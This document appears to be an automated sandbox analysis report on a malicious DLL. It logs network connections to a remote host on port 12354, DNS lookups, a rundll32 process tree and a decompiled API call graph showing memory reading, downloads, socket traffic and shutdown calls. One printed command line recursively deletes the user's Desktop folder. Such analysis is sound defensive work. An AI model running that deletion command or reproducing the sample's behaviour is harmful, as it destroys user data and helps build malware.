                                    Nov 19, 2024 14:26:55.326466084 CET4988780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:55.513948917 CET4988612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:56.218348026 CET4988912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:56.355493069 CET4989012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:56.729166031 CET4989180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:57.310892105 CET4988912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:57.313441038 CET498786520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:57.450083971 CET4989012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:57.810874939 CET4989180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:59.310976028 CET4988912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:59.498353958 CET4989012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:59.826452971 CET4989180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:00.238456964 CET4989212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:00.476861000 CET4989312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:00.477161884 CET4989480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:01.275685072 CET4989212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:01.498356104 CET4989312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:01.514012098 CET4989480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:03.310951948 CET4989212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:03.422241926 CET498956520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:27:03.498512030 CET4989312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:03.514014959 CET4989480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:04.289127111 CET4989612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:04.393584013 CET4989712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:04.411619902 CET4989880192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:04.420202971 CET498956520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:27:05.310898066 CET4989612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:05.420259953 CET4989712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:05.483367920 CET4989880192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:06.518098116 CET498956520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:27:07.313317060 CET4989612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:07.498363972 CET4989880192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:07.623383999 CET4989712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:08.608614922 CET4989912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:08.608794928 CET4990012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:08.609110117 CET4990180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:09.631351948 CET4989912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:09.631429911 CET4990012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:09.701478958 CET4990180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:10.623488903 CET498956520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:27:11.701674938 CET4990180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:11.810897112 CET4989912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:11.811297894 CET4990012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:12.624401093 CET4990212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:12.742626905 CET4990312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:12.745316029 CET4990480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:13.623603106 CET4990212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:13.811434984 CET4990480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:13.811438084 CET4990312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:15.623408079 CET4990212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:15.810926914 CET4990312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:15.810940027 CET4990480192.168.2.10202.108.0.52
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 19, 2024 14:23:37.276221037 CET | 55268 | 53 | 192.168.2.10 | 1.1.1.1
Nov 19, 2024 14:23:37.283813000 CET | 53 | 55268 | 1.1.1.1 | 192.168.2.10
Nov 19, 2024 14:23:54.335678101 CET | 49672 | 53 | 192.168.2.10 | 1.1.1.1
Nov 19, 2024 14:23:54.655605078 CET | 53 | 49672 | 1.1.1.1 | 192.168.2.10
Nov 19, 2024 14:24:54.973100901 CET | 60486 | 53 | 192.168.2.10 | 1.1.1.1
Nov 19, 2024 14:24:55.349698067 CET | 53 | 60486 | 1.1.1.1 | 192.168.2.10
Nov 19, 2024 14:25:55.236169100 CET | 57941 | 53 | 192.168.2.10 | 1.1.1.1
Nov 19, 2024 14:25:55.780548096 CET | 53 | 57941 | 1.1.1.1 | 192.168.2.10
Nov 19, 2024 14:26:56.358879089 CET | 50400 | 53 | 192.168.2.10 | 1.1.1.1
Nov 19, 2024 14:26:56.728183985 CET | 53 | 50400 | 1.1.1.1 | 192.168.2.10
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Nov 19, 2024 14:23:37.276221037 CET | 192.168.2.10 | 1.1.1.1 | 0xddf0 | Standard query (0) | blog.sina.com.cn | A (IP address) | IN (0x0001) | false
                                    Nov 19, 2024 14:23:54.335678101 CET | 192.168.2.10 | 1.1.1.1 | 0x7018 | Standard query (0) | blog.sina.com.cn | A (IP address) | IN (0x0001) | false
                                    Nov 19, 2024 14:24:54.973100901 CET | 192.168.2.10 | 1.1.1.1 | 0x8cbe | Standard query (0) | blog.sina.com.cn | A (IP address) | IN (0x0001) | false
                                    Nov 19, 2024 14:25:55.236169100 CET | 192.168.2.10 | 1.1.1.1 | 0xa670 | Standard query (0) | blog.sina.com.cn | A (IP address) | IN (0x0001) | false
                                    Nov 19, 2024 14:26:56.358879089 CET | 192.168.2.10 | 1.1.1.1 | 0xe8c3 | Standard query (0) | blog.sina.com.cn | A (IP address) | IN (0x0001) | false
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Nov 19, 2024 14:23:37.283813000 CET | 1.1.1.1 | 192.168.2.10 | 0xddf0 | No error (0) | blog.sina.com.cn  | blogx.sina.com.cn |              | CNAME (Canonical name) | IN (0x0001) | false
                                    Nov 19, 2024 14:23:37.283813000 CET | 1.1.1.1 | 192.168.2.10 | 0xddf0 | No error (0) | blogx.sina.com.cn |                   | 202.108.0.52 | A (IP address)         | IN (0x0001) | false
                                    Nov 19, 2024 14:23:54.655605078 CET | 1.1.1.1 | 192.168.2.10 | 0x7018 | No error (0) | blog.sina.com.cn  | blogx.sina.com.cn |              | CNAME (Canonical name) | IN (0x0001) | false
                                    Nov 19, 2024 14:23:54.655605078 CET | 1.1.1.1 | 192.168.2.10 | 0x7018 | No error (0) | blogx.sina.com.cn |                   | 202.108.0.52 | A (IP address)         | IN (0x0001) | false
                                    Nov 19, 2024 14:24:55.349698067 CET | 1.1.1.1 | 192.168.2.10 | 0x8cbe | No error (0) | blog.sina.com.cn  | blogx.sina.com.cn |              | CNAME (Canonical name) | IN (0x0001) | false
                                    Nov 19, 2024 14:24:55.349698067 CET | 1.1.1.1 | 192.168.2.10 | 0x8cbe | No error (0) | blogx.sina.com.cn |                   | 202.108.0.52 | A (IP address)         | IN (0x0001) | false
                                    Nov 19, 2024 14:25:55.780548096 CET | 1.1.1.1 | 192.168.2.10 | 0xa670 | No error (0) | blog.sina.com.cn  | blogx.sina.com.cn |              | CNAME (Canonical name) | IN (0x0001) | false
                                    Nov 19, 2024 14:25:55.780548096 CET | 1.1.1.1 | 192.168.2.10 | 0xa670 | No error (0) | blogx.sina.com.cn |                   | 202.108.0.52 | A (IP address)         | IN (0x0001) | false
                                    Nov 19, 2024 14:26:56.728183985 CET | 1.1.1.1 | 192.168.2.10 | 0xe8c3 | No error (0) | blog.sina.com.cn  | blogx.sina.com.cn |              | CNAME (Canonical name) | IN (0x0001) | false
                                    Nov 19, 2024 14:26:56.728183985 CET | 1.1.1.1 | 192.168.2.10 | 0xe8c3 | No error (0) | blogx.sina.com.cn |                   | 202.108.0.52 | A (IP address)         | IN (0x0001) | false


                                    Target ID:0
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\System32\loaddll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll"
                                    Imagebase:0xf50000
                                    File size:126'464 bytes
                                    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:1
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff620390000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1
                                    Imagebase:0xd70000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\NaRZIOq3O8.dll,Group
                                    Imagebase:0x590000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:4
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1
                                    Imagebase:0x590000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                    Imagebase:0xd70000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff620390000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\PING.EXE
                                    Wow64 process (32bit):true
                                    Commandline:ping 127.0.0.1 -n 3
                                    Imagebase:0x5d0000
                                    File size:18'944 bytes
                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:10
                                    Start time:08:23:08
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group
                                    Imagebase:0x590000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:08:23:08
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                    Imagebase:0xd70000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:08:23:08
                                    Start date:19/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff620390000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:13
                                    Start time:08:23:08
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\PING.EXE
                                    Wow64 process (32bit):true
                                    Commandline:ping 127.0.0.1 -n 3
                                    Imagebase:0x5d0000
                                    File size:18'944 bytes
                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:15
                                    Start time:08:23:38
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group
                                    Imagebase:0x590000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:16
                                    Start time:08:23:38
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                    Imagebase:0xd70000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:17
                                    Start time:08:23:38
                                    Start date:19/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff620390000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:18
                                    Start time:08:23:38
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\PING.EXE
                                    Wow64 process (32bit):true
                                    Commandline:ping 127.0.0.1 -n 3
                                    Imagebase:0x5d0000
                                    File size:18'944 bytes
                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:19
                                    Start time:08:23:46
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group
                                    Imagebase:0x590000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:20
                                    Start time:08:23:46
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                    Imagebase:0xd70000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:21
                                    Start time:08:23:46
                                    Start date:19/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff620390000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:22
                                    Start time:08:23:46
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\PING.EXE
                                    Wow64 process (32bit):true
                                    Commandline:ping 127.0.0.1 -n 3
                                    Imagebase:0x5d0000
                                    File size:18'944 bytes
                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:8.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:13.5%
                                      Total number of Nodes:812
                                      Total number of Limit Nodes:19
6606->6662 6666 1000b000 SafeArrayGetVartype SafeArrayAccessData 6608->6666 6609->6602 6614 1000ad93 6616 1000ada8 6614->6616 6617 1000ad9e InterlockedIncrement 6614->6617 6615 1000adf0 VariantClear 6615->6598 6619 1000ae00 6615->6619 6618 1000a9d0 2 API calls 6616->6618 6617->6616 6620 1000adb1 6618->6620 6621 10011465 _CxxThrowException 6619->6621 6620->6598 6622 10006830 2 API calls 6620->6622 6621->6598 6622->6623 6623->6598 6625 1000a104 6624->6625 6626 1000a9b6 InterlockedIncrement 6624->6626 6625->6485 6626->6625 6628 10011320 6 API calls 6627->6628 6629 1000aa3c 6628->6629 6630 1000aa50 6629->6630 6631 10011465 _CxxThrowException 6629->6631 6630->6481 6631->6630 6705 10011473 6632->6705 6636 1000aa92 6635->6636 6637 1000aa83 6635->6637 6639 1000aaad 6636->6639 6640 1000aaa6 SysStringLen 6636->6640 6637->6636 6638 1000aa89 SysStringLen 6637->6638 6638->6636 6641 1000aaaf SysAllocStringByteLen 6639->6641 6640->6641 6642 1000aac7 6641->6642 6643 1000aad5 6641->6643 6642->6643 6644 10011465 _CxxThrowException 6642->6644 6643->6491 6644->6643 6646 1000a74f 6645->6646 6647 1001132f lstrlen 6645->6647 6646->6560 6646->6562 6655 10010fa0 6647->6655 6650 10011363 GetLastError 6652 1001137d 6650->6652 6653 1001136f GetLastError 6650->6653 6651 10011385 SysAllocString 6651->6646 6654 10011465 _CxxThrowException 6652->6654 6653->6652 6654->6651 6656 10010fac MultiByteToWideChar 6655->6656 6656->6650 6656->6651 6658 10006871 6657->6658 6659 10006842 6657->6659 6658->6596 6660 10006853 6659->6660 6661 1000684c SysFreeString 6659->6661 6660->6596 6661->6660 6663 1000af91 6662->6663 6664 1000af83 6662->6664 6663->6623 6664->6663 6665 10011465 _CxxThrowException 6664->6665 6665->6663 6667 1000b183 6666->6667 6679 1000b05d 6666->6679 6669 1000b191 InterlockedIncrement 6667->6669 6670 1000b1c2 6667->6670 6668 1000b17b SafeArrayUnaccessData 6668->6667 6669->6670 6672 1000b1a3 InterlockedDecrement 6669->6672 6670->6614 6671 1000b074 6D262DD0 6674 1000b094 SysAllocString 
6671->6674 6671->6679 6672->6670 6673 1000b1b1 6672->6673 6673->6670 6677 1000b1bb SysFreeString 6673->6677 6674->6679 6675 1000b177 6675->6668 6676 1000b0d3 6D262DD0 6676->6679 6677->6670 6678 10011465 _CxxThrowException 6678->6676 6679->6668 6679->6671 6679->6675 6679->6676 6679->6678 6680 10011465 _CxxThrowException 6679->6680 6681 1000aa60 4 API calls 6679->6681 6682 1000b10e InterlockedDecrement 6679->6682 6683 1000b142 InterlockedDecrement 6679->6683 6684 1000b1f0 SysFreeString 6679->6684 6680->6679 6681->6679 6682->6679 6683->6679 6684->6679 6686 1000afac 6685->6686 6687 1000afb9 VariantChangeType 6686->6687 6688 1000ade2 6686->6688 6687->6688 6689 1000afc8 6687->6689 6691 1000ae80 6688->6691 6690 10011465 _CxxThrowException 6689->6690 6690->6688 6692 1000aea0 InterlockedDecrement 6691->6692 6693 1000aede 6D262DD0 6691->6693 6696 1000aeae 6692->6696 6701 1000aebf 6692->6701 6694 1000af40 6693->6694 6695 1000aefa SysAllocString 6693->6695 6694->6615 6697 1000af28 6695->6697 6698 1000af1a 6695->6698 6699 1000aeb8 SysFreeString 6696->6699 6696->6701 6697->6615 6698->6697 6700 10011465 _CxxThrowException 6698->6700 6699->6701 6700->6697 6701->6693 6703 10006889 SysFreeString 6702->6703 6704 10006890 6702->6704 6703->6704 6704->6585 6709 10011497 6705->6709 6708 10011470 6708->6487 6710 10011489 _CxxThrowException 6709->6710 6710->6708 6712 10006f4a 6711->6712 6724 100068c0 13 API calls 6712->6724 6714 10006f52 wsprintfA 6725 10006a20 6714->6725 6718 10007027 6732 10006240 6718->6732 6720 1000703c 6721 10007043 OpenProcess 6720->6721 6722 1000707d 6720->6722 6721->6722 6723 10007059 CreateThread 6721->6723 6722->6350 6723->6722 6777 10006e10 6723->6777 6724->6714 6726 10010fa0 6725->6726 6727 10006a2a strchr 6726->6727 6728 10006b53 wsprintfA wsprintfA CreateDirectoryA 6727->6728 6729 10006a89 6727->6729 6731 100057f0 CreateFileA WriteFile CloseHandle 6728->6731 6730 10006a92 strchr 6729->6730 6730->6728 6730->6730 6731->6718 6733 10010fa0 6732->6733 6734 
1000625f CoInitializeEx CoInitializeSecurity CoCreateInstance 6D262DD0 6733->6734 6735 100062d3 SysAllocString 6734->6735 6736 100062fb 6734->6736 6735->6736 6737 100062ed 6735->6737 6738 10011465 _CxxThrowException 6736->6738 6740 1000631c 6736->6740 6737->6736 6739 10011465 _CxxThrowException 6737->6739 6738->6740 6739->6736 6741 10006359 CoSetProxyBlanket wcscat 6D262DD0 6740->6741 6742 10006830 2 API calls 6740->6742 6743 100063f1 6741->6743 6744 100063c8 SysAllocString 6741->6744 6742->6741 6746 10006412 6D262DD0 6743->6746 6747 10011465 _CxxThrowException 6743->6747 6744->6743 6745 100063df 6744->6745 6745->6743 6748 10011465 _CxxThrowException 6745->6748 6750 10006472 6746->6750 6751 10006449 6746->6751 6747->6746 6748->6743 6754 10011465 _CxxThrowException 6750->6754 6756 10006490 6750->6756 6752 10011320 6 API calls 6751->6752 6753 10006459 6752->6753 6753->6750 6755 10011465 _CxxThrowException 6753->6755 6754->6756 6755->6750 6757 100064c5 6756->6757 6758 10006830 2 API calls 6756->6758 6759 10006830 2 API calls 6757->6759 6776 100064db 6757->6776 6758->6757 6759->6776 6760 100067c7 VariantClear VariantClear 6761 100067e5 CoUninitialize 6760->6761 6761->6720 6762 10006507 VariantInit VariantInit VariantInit 6762->6776 6764 10006575 6D262DD0 6765 100065b3 SysAllocString 6764->6765 6764->6776 6765->6776 6766 10011395 6 API calls 6766->6776 6767 10006664 InterlockedDecrement 6768 1000667b _strcmpi 6767->6768 6767->6776 6769 10006696 6D262DD0 6768->6769 6768->6776 6770 100066d1 SysAllocString 6769->6770 6769->6776 6770->6776 6771 10006880 SysFreeString 6771->6768 6772 10011465 _CxxThrowException 6772->6776 6773 10006785 InterlockedDecrement 6774 1000679c StrStrIA 6773->6774 6773->6776 6774->6776 6775 10006880 SysFreeString 6775->6774 6776->6760 6776->6762 6776->6764 6776->6766 6776->6767 6776->6768 6776->6771 6776->6772 6776->6773 6776->6774 6776->6775 6778 10006e42 6D262DD0 6777->6778 6779 10006e3e 6777->6779 6783 10006e55 6778->6783 6779->6778 6780 10006f11 
6782 10006f17 CloseHandle 6780->6782 6781 10006e5f VirtualQueryEx 6781->6780 6781->6783 6783->6780 6783->6781 6784 10006eb4 ReadProcessMemory 6783->6784 6785 10006ea3 6D262DD0 6783->6785 6787 10006b60 6783->6787 6784->6783 6785->6784 6788 10006b6a 6787->6788 6789 10006bca wsprintfA 6788->6789 6790 10006db3 6788->6790 6791 10006a20 2 API calls 6789->6791 6790->6783 6792 10006c1c wsprintfA wsprintfA CreateDirectoryA 6791->6792 6795 100057f0 CreateFileA WriteFile CloseHandle 6792->6795 6794 10006ca7 14 API calls 6794->6788 6795->6794 6796->6367 6813 100050e0 InternetOpenA 6797->6813 6799 100080cb 6800 100080d2 6799->6800 6814 10005100 InternetOpenUrlA 6799->6814 6800->6369 6802 10008104 6802->6369 6803 100080fa 6803->6802 6806 10008148 6803->6806 6805 10008199 6 API calls 6805->6806 6806->6805 6807 10008237 6806->6807 6815 10005130 InternetReadFile 6806->6815 6808 10008323 wsprintfA 6807->6808 6811 100082b1 6807->6811 6809 10008344 6808->6809 6810 10008376 strrchr 6809->6810 6812 10008386 6810->6812 6811->6369 6812->6369 6813->6799 6814->6803 6815->6806 6816->6377 6840 10007e20 6817->6840 6819 100091fc 6855 100073c0 setsockopt 6819->6855 6823 10009213 6824 10009227 send 6823->6824 6825 10009245 closesocket 6824->6825 6834 1000925a 6824->6834 6826 1000942f 6827 10009264 select 6828 10009422 InterlockedExchange 6827->6828 6827->6834 6828->6826 6829 100092af __WSAFDIsSet 6829->6827 6830 100092c1 recv 6829->6830 6830->6828 6830->6834 6831 10009399 InterlockedExchange 6831->6827 6832 100093dc strstr 6832->6834 6835 100093f3 CreateThread 6832->6835 6833 10009359 closesocket 6833->6827 6834->6826 6834->6827 6834->6829 6834->6831 6834->6832 6834->6833 6838 10007940 6 API calls 6834->6838 6839 10005160 ExitWindowsEx 6834->6839 6876 100079f0 6834->6876 6886 10007a80 LoadLibraryA LoadLibraryA GetProcAddress GetProcAddress 6D262DD0 6834->6886 6835->6827 6946 10008bf0 6835->6946 6838->6834 6839->6834 6841 10007fa6 WSAStartup htons 6840->6841 6842 10007eb8 strstr 6840->6842 6888 
10007090 inet_addr inet_addr 6841->6888 6843 10007eda 6842->6843 6846 10007f2d 6842->6846 6892 10007bf0 6843->6892 6849 10007f55 strstr 6846->6849 6848 10007ee7 strstr 6848->6846 6852 10007ef8 strcspn strstr 6848->6852 6849->6841 6853 10007f68 strcspn strncpy strcspn atoi 6849->6853 6850 10008005 closesocket 6850->6819 6851 1000801a 6851->6819 6852->6849 6854 10007f13 strcspn strncpy 6852->6854 6853->6841 6854->6849 6856 100073e1 WSAIoctl 6855->6856 6857 10007415 6855->6857 6856->6857 6858 10007750 RegOpenKeyExA 6857->6858 6859 100077c6 6858->6859 6860 10007789 6858->6860 6913 10007100 6859->6913 6911 10005360 RegQueryValueExA 6860->6911 6863 100077bc 6912 10005350 RegCloseKey 6863->6912 6866 10007420 2 API calls 6867 10007829 GlobalMemoryStatusEx 6866->6867 6868 10007851 6867->6868 6869 100050c0 wvsprintfA 6868->6869 6870 10007867 GetSystemDefaultUILanguage 6869->6870 6919 10007670 6870->6919 6872 100078da 6873 100078e1 6872->6873 6874 100050c0 wvsprintfA 6872->6874 6873->6823 6875 1000792b 6874->6875 6875->6823 6877 100050c0 wvsprintfA 6876->6877 6878 10007a0b 6877->6878 6943 10005290 CreateFileA 6878->6943 6880 10007a2f 6881 10007a39 6880->6881 6944 100051d0 WriteFile 6880->6944 6881->6834 6883 10007a66 6945 100051c0 CloseHandle 6883->6945 6885 10007a6c 6885->6834 6887 10007b1b 6886->6887 6887->6834 6889 100070a6 6888->6889 6891 100070ac socket connect 6888->6891 6905 10005050 gethostbyname 6889->6905 6891->6850 6891->6851 6893 10007bfa 6892->6893 6906 100050e0 InternetOpenA 6893->6906 6895 10007c23 6896 10007c91 6895->6896 6907 10005100 InternetOpenUrlA 6895->6907 6896->6848 6898 10007c46 6899 10007c77 6898->6899 6908 10005130 InternetReadFile 6898->6908 6910 10005150 InternetCloseHandle 6899->6910 6902 10007c80 6902->6848 6903 10007c71 6909 10005150 InternetCloseHandle 6903->6909 6905->6891 6906->6895 6907->6898 6908->6903 6909->6899 6910->6902 6911->6863 6912->6859 6914 100071c4 6913->6914 6915 10007117 6913->6915 6914->6866 6915->6914 6916 1000712b 
